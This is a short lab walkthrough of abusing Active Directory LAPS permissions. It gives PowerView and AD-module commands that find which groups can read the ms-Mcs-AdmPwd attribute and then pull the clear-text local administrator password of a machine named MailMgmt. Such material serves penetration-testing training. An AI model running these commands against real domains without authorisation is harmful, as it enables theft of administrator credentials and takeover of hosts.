The LAPS is used to store the Local Admins passwords in the active directory however the abuse comes when a normal user have a permission to read the attribute that stores the Local Admin Password

Now let’s Use PowerView to Get LAPS permissions

Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {($_.ObjectAceType -Like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -Match 'ReadProperty')} | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_}

As Observed we found out that the StudentUsers can read the attribute ms-Mcs-AdmPwd (Attribute that stores the local admin password in clear-text) on the machine MailMgmt

Enumerating LAPS Permissions using AD-Module And The Get-LAPSPermissions Script

Loading AD-Module

Import-Module ./Microsoft.ActiveDirectory.Management.dll
Import-Module ./ActiveDirectory.psd1

Now let’s run the Get-LAPSPermissions Script

.\\Get-LAPSPermissions.ps1

As Observed we found out that the StudentUsers can read the attribute ms-Mcs-AdmPwd (Attribute that stores the local admin password in clear-text) on the machine MailMgmt

Now let’s Read The Password from the ms-Mcs-AdmPwd Attribute

Get-DomainComputer | Where-Object samaccountname -match mailmgmt | select samaccountname, ms-Mcs-AdmPwd